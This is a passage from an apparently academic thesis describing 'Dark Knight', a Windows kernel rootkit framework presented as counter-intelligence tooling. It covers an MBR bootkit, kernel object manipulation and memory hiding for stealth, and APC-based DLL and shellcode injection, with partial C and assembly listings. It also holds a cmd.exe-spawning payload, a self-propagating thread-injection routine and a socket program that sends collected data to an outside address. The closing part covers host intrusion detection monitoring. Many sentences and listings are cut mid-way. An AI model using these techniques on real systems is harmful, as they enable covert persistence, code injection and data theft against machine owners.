complete, with a retry path for the injection process.]
With the acquired information from the APC blueprint we explored the capability
of APCs to perform injection. With injection we are able to insert a payload into a
process’ context and have it execute while masking the payload’s origin. This gives
mechanism to fire a single payload into a thread that propagates through the system
autonomously executing our desired payload.
These findings support the criteria outlined in Section 2.2, and are evidence of the
capacity of the various researched techniques to support counter-intelligence opera-
tions. With these techniques we are able to formulate a framework to support such
counter-intelligence operations. We present such a framework in the next chapter.
Chapter 4
Dark Knight
This chapter discusses the implementation of Dark Knight, our framework developed
to satisfy the requirements based on the criteria outlined in Section 2.2, combining
the functionality outlined in Section 2.6 with the capabilities of APCs as explored in
Chapter 3. This chapter contains an overview of the different framework components
and implementation details of each of the different components.
• MBR Bootkit: The first stage loader of our framework—the bootstrap mecha-
nism that achieves a persistent footprint and initiates kernel-mode residence—is
an MBR modification that hooks interrupt 13h and redirects the bootstrap flow
so the system initialization first enters a segment of code controlled by us. This
allows us to hijack the normal system execution path so our core system driver
can be injected into the Windows bootup process for guaranteed execution as
• Payloads: The various types of packages that can be employed by Dark Knight.
This includes payloads that investigate malicious threats through dynamic in-
This chapter explores each of these components in detail while explaining their re-
spective function within the framework. As such, the chapter is broken down in a
modular fashion to mimic the framework’s construct.
A first stage MBR bootkit loader provides an adequate means of gaining initial control
of the target enabling us to load Dark Knight with primacy. The technique used in
our research follows the methods outlined in Section 2.6.1, using a modified MBR to
redirect the initial OS loading through us.
The Dark Knight driver is broken into multiple segments. It consists of a subsystem
that is loaded into kernel-mode containing units that accomplish various tasks. The
first task involves table hooking, DKOM, and virtual memory subversion enabling the
necessary level of system modifications to maintain a stealth footprint in kernel-mode
while also commandeering the required system objects, such as the system thread
table for locating a suitable target thread prior to injection. The second task involves
of APC injection via our Trident and Sidewinder techniques, as outlined in Chapter 3.
The architecture of the Dark Knight kernel-mode driver is shown in Figure 4.1.
This provides a high-level overview of the kernel-mode primacy table hooks, kernel
object manipulation, and virtual memory subversion (Section 4.2.1) as well as the
utilization of both the Trident and Sidewinder injection techniques (Section 4.2.3).
This figure neglects the payload remapping methods (Section 4.2.2) as these apply
internally to the driver or Sidewinder payload and cannot be adequately depicted.
[Figure 4.1: Architecture of the Dark Knight kernel-mode driver. Recoverable labels:
table hooks, Kernel-Mode, Target OS, Target System.]
Together, these pieces build our Dark Knight framework, supporting counter-
intelligence investigations. This section will discuss each of these components and
The first segment of our driver achieves kernel-mode dominance, hooking and modify-
ing required system objects in order to remain concealed while enabling our developed
APC payload injection techniques. This subsection discusses how Dark Knight ac-
complishes this, utilizing table hooking, DKOM, and virtual memory subversion.
The seizure made by the driver follows the tactics outlined in Section 2.6.2, hooking
the kernel debugger structure (KDDEBUGGER_DATA64) in order to access the
non-exported functionality. Once this is done the driver continues to hook the system
thread table (PspCidTable) to allow for both a complete view of the system’s pro-
cesses and threads as well as the ability to manipulate any given executive process
(EPROCESS) or thread (ETHREAD) structure. The DKOM component can be used to
make any process or thread on the system invisible, to control the alertable nature of
any process or thread in order to force them to execute APCs, as well as any other
alteration to kernel-mode or user-mode objects that enable covert influence over the
system. It is also possible to hijack any, or all, of the tables outlined in Section 2.3.2,
It is also useful to employ the tactics of the Shadow Walker rootkit, as was discussed in
Section 2.3.2. This technique enables redirection of R/W accesses to different virtual
memory locations, making any region viewed via a R/W access look benign, while
mapping the executable memory directly to the desired code segment. By changing
the view between a R/W and an execution we are able to make the central driver
virtually invisible by hiding from any R/W accesses. This makes it increasingly diffi-
cult for any scanning program to locate the driver, if the driver is required to remain
persistent on the system. If we are using the Sidewinder technique, rapidly firing
through memory between different processes and threads, then we have no require-
ment to keep the driver persistent, and can instead use the half-loader technique in
Three payload remapping techniques are explored. These utilize different mechanisms
in positioning injected payloads within a target process or thread’s address space.
code remapping.
then we must dynamically transform the shellcode sequence prior to injecting the
payload into memory. Normally shellcode is written based on a defined set of expec-
tations that occur in a faulty utilization of the stack or heap. We are aware of the
offsets within the shellcode (or have a high certainty when predicting their location),
and are free to define them during their construction. Unfortunately for us, this is
not the case. The location of the injected code constantly changes between every
injection, and therefore we must calculate any dynamic offsets using metamorphic
In order to accomplish this we’ve created the structure shown in Listing 4.1,
METAMORPHIC_SHELLCODE. This structure contains pointers to the start, pStart, and
end, pEnd, of the injectable shellcode, as well as a set of transformations to be made.
code has been injected, as denoted by the POST mnemonic. Alternatively, to perform
alterations prior to injection the PRE mnemonic can be used.
Listing 4.2: Metamorphic transformation sequence for inserting text string into payload
and linking to associated location.

POST REF:[0x000001a8:+0x28] AND INSERT:[0x000001d0]=\"C:\\WINXP\\System32\\cmd.exe\"
using the WIN32API enabling PIC injection into target processes. Once the DLL is
created it is injected using the method shown in Listing 4.3, as outlined by Sensey
[82]. This technique operates purely in user-mode.
if (!NtMapViewOfSection) status = -1;
if (!pcView)
{
    CloseHandle(hFile);
    status = -1;
}
else
{
    strcpy(pcView, dllName);
}
// start injectable process
ZeroMemory(&piInfo, sizeof(piInfo));
ZeroMemory(&stInfo, sizeof(stInfo));
stInfo.cb = sizeof(STARTUPINFO);
{
    status = -1;
}
}
else
{
    status = -1;
}
// resume suspended thread
ResumeThread(piInfo.hThread);
CloseHandle(piInfo.hThread);
CloseHandle(piInfo.hProcess);
}
else
{
    status = -1;
}
UnmapViewOfFile(pcView);
CloseHandle(hFile);
return (status);
}
will inject payload.dll into a new instance of Internet Explorer. This process starts
by creating a function pointer to NtMapViewOfSection, a kernel-mode system service
routine that maps a view of the selected virtual address space section of the target
process. We acquire this pointer by getting the address of NtMapViewOfSection
from ntdll.dll with GetProcAddress. We then proceed to create a file map-
ping of the payload DLL, as specified by dllName. We create our mapping with
CreateFileMapping and map the view of our payload into the address space of
the target process with MapViewOfFile. We then create a suspended thread with
CreateProcess and, using our NtMapViewOfSection function pointer, we map our
payload DLL into the created thread. We complete the DLL injection process issu-
ing a call to QueueUserAPC to queue an APC to our created thread that will ensure
execution once the thread is resumed. We complete the entire process by cleaning up
our open handles, resuming our thread and unmapping our view. This can also be
used to inject into an existing process using OpenProcess instead of CreateProcess.
We have furthered this technique by moving the injection routine from user-mode
into our kernel-mode driver, enabling injection into user-mode processes using the
technique shown in Listing 4.4. This process begins by searching through the target
process’ loaded module list in order to acquire the base address of kernel32.dll.
This is achieved by walking through the target process’ executive process (EPROCESS)
structure, accessing the process environment block (PEB), and finally accessing the
process' associated loader data (PEB_LDR_DATA). Via the loader data we can walk through
each entry (LDR_DATA_TABLE_ENTRY) until we locate the desired entry. From the
returned entry we can use the base address of kernel32.dll (DllBase) as a handle
to the DLL, which is used to locate the address of LoadLibrary via GetProcedure-
process with ZwOpenProcess and inserting the path of our payload DLL into mem-
ory via ZwAllocateVirtualMemory. Finally, we initialize our APC object with the
PKNORMAL_ROUTINE parameter set to our acquired address of LoadLibrary with the
context set to the path of our payload DLL, and insert the APC into the target pro-
cess’ queue. When the APC next fires LoadLibrary is called and our payload DLL
// Acquire PEB structure
pPeb = peProcess->Peb;
// Iterate through PEB_LDR_DATA
do
{
pDllName = &(pLdrListEntry->BaseDllName);
// If we located kernel32.dll
if (bMatch)
{
// Get the address of LoadLibrary with modified kernel-mode GetProcAddress
pLoadLibrary = GetProcedureAddress(pLdrListEntry->DllBase,
                                   pLdrListEntry->SizeOfImage,
                                   "LoadLibraryExA");
if (pLoadLibrary != NULL)
{
// Open a handle to the target process
// Allocate pool
pkApc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
if (pkApc != NULL)
{
// Initialize APC
KeInitializeApc(pkApc,
                pkTargetThread,
                0,
                (PKKERNEL_ROUTINE)&ApcKernelRoutineDll,
                0,
                (PKNORMAL_ROUTINE)pLoadLibrary,
                UserMode,
                pMemory);
status = STATUS_SUCCESS;
}
}
}
ZwClose(hProcId);
}
}
}
else
{
KeUnstackDetachProcess(&ApcState);
}
return (status);
}
Once user-mode or kernel-mode DLL injection has occurred the payload’s entry-
point (DllMain) is called and a thread is spawned and executed. Listing 4.5 shows an
time spent in DllMain in order to avoid a deadlock race condition with the process’
loader lock [83].
user-mode and user-mode to user-mode DLL injection methods enable both of our
Trident and Sidewinder techniques, as discussed in Chapter 3. The downside of
this method is that it leaves evidence behind as the DLL exists temporarily on-disk
prior to injection and the DLL appears in the process’ loaded module list. Both
of these problems can be mitigated. For example, by using the method shown in
Listing 4.4 to locate kernel32.dll we can unlink our associated DLL entry from
the loaded module linked list, thereby making it invisible. A third issue also exists
This problem can also be bypassed by adding a detour to the OS’s implementation
of PsSetLoadImageNotifyRoutine and filtering its callbacks whenever it executes
with FullImageName matching one of our payloads. DLL injection is provided as an
Listing 4.5: Example of a DLL payload used in kernel-mode or user-mode DLL APC
injection.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
return (1);
}
extern "C" __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hInst,
                                                     DWORD dwReason,
                                                     LPVOID lpReserved)
{
    HANDLE hThread; // Thread handle
    DWORD nThread;  // Thread ID
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        // Create a new thread
        if ((hThread = CreateThread(NULL, 0, PayloadThread, NULL,
                                    0, &nThread)) != NULL)
        {
            // Close thread handle
            CloseHandle(hThread);
        }
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return (true);
}
Following the metamorphic payload generation, we are able to avoid the use of trans-
formation sequences by creating user-mode programs with the WIN32API and re-
moving their PE headers while extracting the relocation information as stored in the
.reloc section of the PE. The relocation information outlines the address remappings
based on a dynamic loading point; if the program loads in a virtual address space
different than that originally specified then the PE loader repairs the locations using
the .reloc section, otherwise it is discarded [84]. This data can be ascertained with
Matt Pietrek’s PEDUMP utility [85].
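The repair step performed with the relocation information amounts to simple arithmetic, which the following portable sketch illustrates. It is a simplified model under stated assumptions, not the PE loader's implementation: the function name apply_fixups, its parameters, and the flat list of offsets are hypothetical, and the real .reloc section groups its entries into per-page blocks with type codes that are not modelled here. The sketch only shows that each recorded 32-bit absolute address is adjusted by the difference between the actual and the originally specified load address, and that nothing changes when the two are equal.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: adjust every 32-bit absolute address recorded in
 * `offsets` by the difference between the actual and preferred base.
 * Returns the number of fixups applied, 0 if the image loaded at its
 * preferred base, or -1 if any offset falls outside the image. */
int apply_fixups(uint8_t *image, size_t image_size,
                 const uint32_t *offsets, size_t count,
                 uint32_t preferred_base, uint32_t actual_base)
{
    /* Unsigned subtraction wraps modulo 2^32, so the same code handles
     * loading above or below the preferred base. */
    uint32_t delta = actual_base - preferred_base;
    size_t i;

    if (delta == 0)
        return 0; /* loaded where expected: relocation data is not needed */

    /* Validate every offset first so the image is never half-patched. */
    for (i = 0; i < count; i++) {
        if (image_size < sizeof(uint32_t) ||
            offsets[i] > image_size - sizeof(uint32_t))
            return -1;
    }

    for (i = 0; i < count; i++) {
        uint32_t value;
        /* memcpy avoids unaligned access on strict-alignment targets. */
        memcpy(&value, image + offsets[i], sizeof value);
        value += delta;
        memcpy(image + offsets[i], &value, sizeof value);
    }
    return (int)count;
}
```

For instance, an address stored as 0x00401010 in an image built for base 0x00400000 becomes 0x10001010 when that image is placed at 0x10000000.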
The .reloc section is the segment used by DLLs for PIC, although in this case
it acts as PIE for PEs. This method shares many similarities with the metamorphic
payload generation technique—the transformation sequences are represented as relo-
Once the payload is available (via one of the techniques outlined in Section 4.2.2) we
must inject the payload into the target process. This follows the injection methodol-
injecting custom redirection calls that allow the alteration of specific functionality
within a resident malicious threat, or any other desired payload.
To initiate this sequence we must first verify that the target process has the
required modules loaded to ensure our shellcode will run unencumbered. This can be
avoided by adding additional LoadLibrary calls to the start of the payload in order
to load the necessary modules, but this method may trigger alarms if any alerting
software notices dynamic loading of modules at runtime. To avoid this, we use the
method in Listing 4.6, outlined by MSDN [86]. This technique relies on user-mode
injection of Listing 4.6 into the process and analyzing the result from kernel-mode.
Our GetProcModules user-mode payload opens the target process specified by
dwProcId with OpenProcess and iterates through the process’ modules with Enum-
if (hProc != NULL)
{
if (EnumProcessModules(hProc, hMods, sizeof(hMods), &dwCbNeeded))
{
// Iterate through all modules belonging to process
for (unsigned int i = 0; i < (dwCbNeeded / sizeof(HMODULE)); i++)
{
TCHAR strModName[MAX_PATH];
CloseHandle(hProc);
}
After verifying that the necessary modules are already loaded into the target pro-
cess we are free to employ our APC injection technique. The payload is injected,
executed and control may either return to the core driver or proceed with further
if (!pkApc) return (STATUS_INSUFFICIENT_RESOURCES);
if (!pMdl)
{
    ExFreePool(pkApc);
    return (STATUS_INSUFFICIENT_RESOURCES);
}
// Perform PRE transformations
AdjustShellcode(pMappedAddress, pCode, "PRE");
__try
{
    // Probe and lock pages to make them memory resident for write access
    MmProbeAndLockPages(pMdl, KernelMode, IoWriteAccess);
}
__except (EXCEPTION_EXECUTE_HANDLER)
{
    IoFreeMdl(pMdl);
    ExFreePool(pkApc);
    return (STATUS_UNSUCCESSFUL);
}
// Perform POST transformations
AdjustShellcode(pMappedAddress, pCode, "POST");
// Initialize APC
KeInitializeApc(pkApc, pkTargetThread, OriginalApcEnvironment, &ApcKernelRoutine,
                NULL, (PKNORMAL_ROUTINE)pMappedAddress, UserMode, (PVOID)NULL);
// Queue APC
if (!KeInsertQueueApc(pkApc, 0, NULL, 0))
{
    // If the queueing procedure failed free the associated resources
    MmUnlockPages(pMdl);
    IoFreeMdl(pMdl);
    ExFreePool(pkApc);
    return (STATUS_UNSUCCESSFUL);
}
return (0);
}
the payload size and allocate an MDL with IoAllocateMdl to describe the pay-
load’s memory. We continue with MmProbeAndLockPages to make our pages, as
described by the MDL, memory resident for write access. Now we are able to at-
tach to the target thread’s address space and map the payload into target address
the case of Listing 4.7 we employ metamorphic payload generation (Section 4.2.2)
which requires both pre- and post-injection transformation of the payload, as shown
then we update the target thread’s kernel thread structure (KTHREAD) to notify it of
our pending APC.
If the Trident technique is employed then we use the KernelRoutine to deal with
the callback and further APC injections, as per Chapter 3. An example callback for
peTargetThread = RandomThread();
ApcInject(peTargetThread, peTargetThread->ThreadsProcess, dynCode);
}
If the Sidewinder technique is utilized then we begin by employing the Dark Knight
framework to inject an initial payload and unload the framework so no driver exists.
In this case it is the actual payload we are interested in, performing injection between
threads in user-mode as discussed in Chapter 3. An implementation of this is shown
in Listing 4.9, although various methods enabling the injection of code into the target
thread exist.
VOID __cdecl ApcInjectAutoPayload()
{
    HANDLE hTargetThread = NULL;
    HANDLE hTargetProcess = NULL;
    THREADENTRY32 teTargetEntry;
    LPVOID lpAddr;
    DWORD dwThreadId;
    DWORD dwProcessId;
    DWORD dwCb;
    DWORD dwBytesReturned;
    DWORD dwLimit;
    DWORD dwBytesWritten;
    // Seed PRNG
    srand((unsigned int)time(NULL));
    if (hTargetThread != INVALID_HANDLE_VALUE)
    {
RETRY_INJECT:
    {
        goto RETRY_INJECT;
    }
    CloseHandle(hTargetThread);
}
Listing 4.9 avoids touching memory disks and object tables in order to evade detec-
tion. It begins by executing the core tasking—the operational goal of the payload—
after which it selects the next target thread by first creating a snapshot of the system’s
current processes, threads, heaps and modules with CreateToolhelp32Snapshot and
iterating through the list of threads with Thread32First and Thread32Next. Once
a target thread has been selected it is acquired with OpenThread, and the thread’s
parent is accessed with OpenProcess, in order to attain handles necessary for code
injection. Now we are free to inject the payload into the target process’ address
space by first allocating a memory segment with VirtualAllocEx, copying the pay-
load into the newly allocated segment with WriteProcessMemory, and finally queueing
the APC at the target with the entrypoint of the payload using QueueUserAPC.
The payload that gets copied into the target address space is the identical compiled
DLL can also be mapped into the address space of the target in order to bypass the
overhead of address relocation associated with the payload (outlined in Section 4.2.2);
however, this also complicates the destruction of the associated file upon completion
and leaves behind trace evidence on disk that can be used to detect our presence.
User-mode threads can also be forced to execute delivered APCs by having them call
KeTestAlertThread.
4.3 Payloads
Dark Knight enables the utilization of a large arsenal of payloads via injection. In this
section we discuss the investigated payloads used in conjunction with Dark Knight
to support counter-intelligence operations. This includes generic shellcode execution,
employing a myriad of community developed tools to support concealed execution,
and code execution manipulation using information ascertained through static code
analysis, enabling the investigators to manipulate the malicious threat. We also in-
vectors.
Almost any existing shellcode can be modified for use. Alterations that must be
enforced include removing the buffer overflow component of exploits, as we are al-
ready running with local privileges and are not concerned with gaining an execution
environment, although we may be interested in privilege escalation if we have only
injected the user-mode payload and require the installation of the kernel-mode loader
component for persistence beyond restart.
One such example of this is shown in Listing 4.10, a payload that executes a com-
mand shell using the WinExec WIN32 API function. Following the explanation of
the metamorphic engine outlined in Section 4.2.2, Listing 4.11 shows the necessary
transformations required to execute this payload. In Listing 4.10 we are targeting
specific addresses associated with Windows XP SP3, but we can instead include
GetProcAddress and LoadLibrary calls in order to make the code generic for execu-
tion on any Windows OS variant.
Listing 4.11: Transformations required for the command shell spawning payload.
POST REF:[0x0000000c:+0x4]
POST INSERT:[0x00000014]=\"C:\\WINXP\\System32\\cmd.exe\"
into the target code and execute functionality identified through static code analysis,
shown in Listing 4.12. This simple method allows non-persistent manipulation of
target code, and can be extended to perform inline injections without the overhead of
static code analysis by analyzing call paths from the Dark Knight driver. We exploit
our understanding of the target OS’s calling conventions, in this case pushing the
Listing 4.12: Shellcode executing a target function acquired with static analysis.
xor eax, eax        ; Zero eax register
mov eax, 0x6f9e72b0 ; Location of target function
push 601            ; Push Nth function parameter
...
push 0              ; Push second function parameter
push 0xffff         ; Push first function parameter
call eax            ; Call function
...
nop                 ; Perform any investigation of
nop                 ; data returned or manipulated
nop                 ; by the target function
...
ret 0x0c            ; Return from the inject
An example utilizing this technique is shown in Listing 4.13. It calls DecryptLogFile,
a function that a malicious program uses to decrypt an enciphered log file stored on
disk and that returns a FILE pointer to the log file. By calling this function
via our injection framework we can decrypt the malicious code’s log file, bypassing
the mode (cMode) to open the file with, and an unknown boolean (bUnknown)—in
reverse order and call the target function DecryptLogFile at the address ascertained
through static code analysis. We complete by returning the original return value of
the target function. In this way we can execute code belonging to the malicious code.
Listing 4.13: Code execution of DecryptLogFile function located through static code
analysis.
#define FUNC_DecryptLogFile 0x57650ce0
_asm
{
    push ebx          // Save original ebx register contents
    xor ebx, ebx      // Clear ebx register
    mov bl, bUnknown  // Prepare unknown parameter
    push ebx          // Push unknown parameter onto call stack
    push cMode        // Push mode onto call stack
    push cFileName    // Push filename onto call stack
    push fLog         // Push pointer to log file set by function
    call dwFunc       // Call DecryptLogFile
    add esp, 0x10     // Adjust stack pointer
    mov bRetVal, al   // Grab return value
    pop ebx           // Restore the saved ebx register contents
}
return (bRetVal);
}
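The stack handling in Listing 4.13 can also be read as an ordinary C call through a typed function pointer. The sketch below is illustrative only: the prototype is an assumption inferred from the four pushed values (the real signature of DecryptLogFile is not given here), and CallTarget and StubDecrypt are hypothetical names, with StubDecrypt standing in for the target so the example runs anywhere. Under the 32-bit cdecl convention a compiler pushes the arguments right to left and the caller releases 4 x 4 = 0x10 bytes afterwards, which is what the add esp, 0x10 instruction does by hand.

```c
#include <stdio.h>

/* Hypothetical prototype inferred from the four pushes in the listing;
   the true signature of the target function is an assumption. */
typedef unsigned char (*DecryptLogFileFn)(FILE **fLog, const char *cFileName,
                                          const char *cMode,
                                          unsigned char bUnknown);

/* Call the target through a typed pointer; the compiler emits the pushes,
   the call, and the stack cleanup that the inline assembly spells out. */
unsigned char CallTarget(DecryptLogFileFn pfn, FILE **fLog,
                         const char *cFileName, const char *cMode,
                         unsigned char bUnknown)
{
    if (pfn == NULL)
        return 0;
    return pfn(fLog, cFileName, cMode, bUnknown);
}

/* Stand-in target used only for demonstration: clears the output pointer
   and echoes the boolean parameter as its return value. */
unsigned char StubDecrypt(FILE **fLog, const char *cFileName,
                          const char *cMode, unsigned char bUnknown)
{
    (void)cFileName;
    (void)cMode;
    if (fLog != NULL)
        *fLog = NULL;
    return bUnknown ? 1 : 0;
}
```

The inline assembly form remains useful when the calling convention of the target is not one the compiler can express; the typed pointer is simply easier to audit when it is.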
Through these techniques we are able to execute code exploiting any functionality,
Another payload vector involves methods of covert exfiltration utilizing existing chan-
nels. One such technique involves hijacking a target program’s sockets or generating
new sockets originating in the target program’s address space. To accomplish this,
we begin by enumerating network connections and, depending on the amount of in-
[87]:
• Bindshell : Dark Knight injects a payload into a target process that binds to a
socket and listens for an incoming connection. This allows a connection to be
initiated from an external machine.
opens a socket and calls out to a specified external machine. This bypasses
firewalls or other protections that filter incoming traffic.
the target process utilizing the existing connection and rebinds to the socket.
the socket calls are OS agnostic. Once the required library is loaded we initialize
our socket with a call to socket, creating a TCP-based stream socket under the
IPv4 address family. With the socket initialized we set up the data associated with
our server, stored in a sockaddr_in structure, to which this connection will be
opened. We proceed with a call to connect to initiate our connection and acquire the
associated locally-bound socket name with getsockname. With all of the appropriate
data in hand, and the connection up, we send our collected data with send. To
finish, we close our connection with closesocket and deinitialize the loaded Winsock2
library with WSACleanup, thereby completing our reverse exfiltration routine. This
works for small amounts of data, but if we wish to exfiltrate large quantities then
we must modify it to continuously send back data, fragmenting cData into smaller
chunks, until nBytesSent equals nDataSize and all collected data is transferred.
// Link winsock2 library
#pragma comment(lib, "ws2_32.lib")
int main()
{
    WSADATA wsaData;
    SOCKET winSock;
    struct sockaddr_in sockSrv;
    char *cIP = ADDR;
    short nPort = PORT;
    char *cData = NULL;
    int nDataSize = 0;
    int nBytesSent = 0;
    int nRetVal = 0;
    // Initialize Winsock2 library
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    // Initialize our socket
    winSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    // Exfiltrate collected data (cData already points at the buffer)
    nBytesSent = send(winSock, cData, nDataSize, 0);
    // Deinitialize Winsock2 library
    WSACleanup();
    return (nRetVal);
}
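The fragmentation described above, sending until nBytesSent equals nDataSize, is the usual partial-send loop. The following is a minimal sketch under stated assumptions, not the thesis implementation: SendAll, send_fn, MockSink and MockSend are hypothetical names, and the transport is abstracted behind a callback so the loop can be exercised without Winsock. With Winsock the callback would wrap a call to send on the connected socket.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical transport callback: returns the number of bytes accepted
   (> 0), or <= 0 on error. */
typedef int (*send_fn)(void *ctx, const char *buf, int len);

/* Send nDataSize bytes in chunks of at most nChunk bytes. Returns the total
   number of bytes sent (equal to nDataSize on success), or -1 on bad input. */
int SendAll(send_fn pfnSend, void *ctx, const char *cData,
            int nDataSize, int nChunk)
{
    int nBytesSent = 0;

    if (pfnSend == NULL || cData == NULL || nDataSize < 0 || nChunk <= 0)
        return -1;

    while (nBytesSent < nDataSize) {
        int nWant = nDataSize - nBytesSent;
        int nRet;

        if (nWant > nChunk)
            nWant = nChunk;
        /* The transport may accept fewer bytes than requested. */
        nRet = pfnSend(ctx, cData + nBytesSent, nWant);
        if (nRet <= 0)
            break;
        nBytesSent += nRet;
    }
    return nBytesSent;
}

/* Stand-in transport for demonstration: accepts at most 3 bytes per call
   and appends them to an in-memory buffer. */
typedef struct {
    char buf[64];
    int len;
    int calls;
} MockSink;

int MockSend(void *ctx, const char *buf, int len)
{
    MockSink *s = (MockSink *)ctx;
    int n = (len > 3) ? 3 : len;

    if (s->len + n > (int)sizeof(s->buf))
        return -1;
    memcpy(s->buf + s->len, buf, (size_t)n);
    s->len += n;
    s->calls++;
    return n;
}
```

A caller compares the return value with nDataSize to decide whether the transfer completed; a shorter count means the transport reported an error partway through.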
detecting anomalous malicious activity. A HIDS is different from anti-virus and anti-
malware solutions in that they are primarily concerned with detecting known threats
and network traffic, as well as performing access control [88]. They may also em-
ploy traditional signature-based analysis techniques—supplementing the shortfalls of
compared back to for malicious changes. HIDS also provide supplemental data that
Network-based Intrusion Detection Systems (NIDS) are unable to capture, such as
gathering packets prior to being encrypted by a malicious exfiltration routine [89].
Considering these characteristics, a HIDS should hook into every potential infec-
tion vector on the system: whether it be watching for DLL or API injection attacks,
hooking the various available tables, monitoring for unexpected overhead that could
be caused by malicious virtualization, or any of the other techniques described in
Chapter 2. Potential infection vectors, with the associated monitored WIN32 API
calls, are discussed below with a few examples showing how this is implemented in
conjunction with the Dark Knight framework.
• Users: The name, description as well as local and global group membership can
be monitored for each user on the system with NetQueryDisplayInformation,
• Groups: The name, description and members can be monitored for each local
and global group associated with the system via NetLocalGroupEnum, Net-
• Shares: The name, path and type (i.e. disk, print queue, device, IPC, temporary
or special) of each share associated with the system can be enumerated with
NetShareEnum.
• Files: The name, path and security descriptor of all files on the system can
be accessed with FindFirstFileW and FindNextFileW to iterate through the
• Named Pipes: The name and associated security descriptor for every named
pipe on the system can be monitored by searching for files matching the format:
"\\.\Pipe\" with FindFirstFileW in order to initialize the first HANDLE pointer
• Mailslots: The name and associated security descriptor for every mailslot on
the system can be monitored employing the same method used for named pipes,
except by searching for files matching the format: "\\.\Mailslot\".
• Environment Variables: The name and associated values for all environment
variables on the system can be monitored with GetEnvironmentStrings.
• Processes: Process information including the name, ID, owner, group, secu-
rity attributes and privileges can be acquired and monitored employing a wide
range of functions. This is done by iterating through the process list via
EnumProcesses after which security info can be queried through the Open-
Attributes.
• Device Drivers: Information pertaining to the device drivers loaded into the
OS kernel, including the image name and image path, can be obtained. This is
accomplished by iterating through the loaded drivers list via EnumDeviceDrivers,
followed by calls to GetDeviceDriverBaseName and GetDeviceDriverFileName.
• Services: The name, display name, account running level, type (i.e. FILE_SYSTEM_DRIVER,
KERNEL_DRIVER, WIN32_OWN_PROCESS or WIN32_SHARE_PROCESS),
state, accepted controls, required privilege levels and image path can be monitored by
accessing the service control manager database with OpenSCManager, accessing the
ENUM_SERVICE_STATUS_PROCESS service structure with EnumServicesStatusEx,
the GetTcpTable and GetUdpTable respectively. Once these tables have been
retrieved and populated into the MIB_TCPTABLE or MIB_UDPTABLE structure, the
members MIB_TCPROW or MIB_UDPROW can be iterated through based on the number
of entries, as defined in dwNumEntries, to access the state, local address,
local port, remote address and remote port for TCP connections and the local
address and local port for UDP connections. This can also be done for IPv6
connection tables.
• Firewall : The state of the firewall, the name of allowed applications, as well as
the name and number of allowed ports can be queried using various OS functionality.
By using CoCreateInstance with the interface structures INetFwProfile,
void HidsGetDeviceDrivers()
{
    LPVOID *lpImageBase = NULL;
    TCHAR strBasename[MAX_SIZE];
    TCHAR strFilename[MAX_SIZE];
    DWORD dwCb = 0;
    DWORD dwCbNeeded = 0;
    {
        if (GetDeviceDriverBaseName(lpImageBase[i], strBasename, NAME_SIZE))
        {
            if (GetDeviceDriverFileName(lpImageBase[i], strFilename,
                                        NAME_SIZE))
            {
                // Acquired basename and filename for device driver i
            }
        }
    }
    }
    free(lpImageBase);
    }
}
using the APC technique outlined in Chapter 3, although they can also be implemented
as a standalone executable. Two example implementations are the enumeration of
device drivers loaded into the OS kernel, shown in Listing 4.15 and based on
the example from MSDN [91], and the monitoring of IPv4 TCP connections, shown
in Listing 4.16 and based on the Netstatp utility from Sysinternals [92].
vice drivers acquiring their base name and filename with GetDeviceDriverBaseName
and GetDeviceDriverFileName respectively. This enables us to locate potentially
malicious device drivers on the target system that either match pre-existing charac-
teristics or appear as outliers on the OS.
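Spotting drivers that "appear as outliers" amounts to comparing the enumerated names against a known-good baseline. The sketch below is one possible form of that comparison, written as portable C so it can be tried without the Windows headers. FindOutliers and EqualNoCase are hypothetical helpers, not part of the Dark Knight source, and the driver names in any usage are placeholders. The comparison ignores ASCII case because Windows file names are case-insensitive.

```c
#include <ctype.h>
#include <stddef.h>

/* ASCII case-insensitive string equality. */
static int EqualNoCase(const char *a, const char *b)
{
    while (*a != '\0' && *b != '\0') {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == *b;
}

/* Record the indices of entries in current[] that are absent from
   baseline[]. At most nOutMax indices are written to outIdx; the return
   value is the number written. */
size_t FindOutliers(const char *const *current, size_t nCurrent,
                    const char *const *baseline, size_t nBaseline,
                    size_t *outIdx, size_t nOutMax)
{
    size_t i, j, nFound = 0;

    for (i = 0; i < nCurrent; i++) {
        int known = 0;

        for (j = 0; j < nBaseline && !known; j++)
            known = EqualNoCase(current[i], baseline[j]);
        if (!known && nFound < nOutMax)
            outIdx[nFound++] = i;
    }
    return nFound;
}
```

In practice the current[] array would be filled from the base names returned for each loaded driver, and the baseline captured from a trusted installation of the same OS build.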
In Listing 4.16 we exhibit a program to list TCP connections in Windows. We
begin with a call to WSAStartup that initializes the Winsock DLL. If the DLL loads
without error then we acquire the IPv4 TCP connection table with GetTcpTable.
We call GetTcpTable first to set dwSize to the required buffer size of pmibTcpTable,
expecting a failure due to ERROR_INSUFFICIENT_BUFFER as we don’t initially know
the TCP table’s size. With the proper buffer size in hand we again call GetTcpTable
with the appropriate dwSize after allocating the necessary space for pmibTcpTable.
We can now iterate through each of the connections acquiring the local and remote
address and port via getservbyport. We can also ascertain other information about
the connections with the MIB_TCPTABLE structure, such as the state of the connection
by mapping the dwState field against our ccTcpState array. A similar technique
can be employed to accomplish monitoring of IPv4 UDP sockets, as well as IPv6 for
both TCP and UDP. This enables us to investigate potentially malicious connections,
whether their remote address is blacklisted or they’re using a port that is known to
be associated with malicious activity.
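The state lookup and port check described above can be sketched in portable C as follows. This is an illustration under assumptions rather than the code of Listing 4.16: TcpStateName, PortFromRow, IsWatchedPort and the table name kTcpStateNames are hypothetical, and any watch list passed in is a placeholder. The state table follows the same ordering as ccTcpState, where index 0 is UNKNOWN and indices 1 to 12 match the documented TCP state values. PortFromRow assumes the port field is read as a little-endian DWORD whose low 16 bits hold the port in network byte order, as is the case on x86 Windows.

```c
#include <stddef.h>

static const char *const kTcpStateNames[] = {
    "UNKNOWN", "CLOSED", "LISTENING", "SYN_SENT",
    "SYN_RCVD", "ESTABLISHED", "FIN_WAIT1", "FIN_WAIT2",
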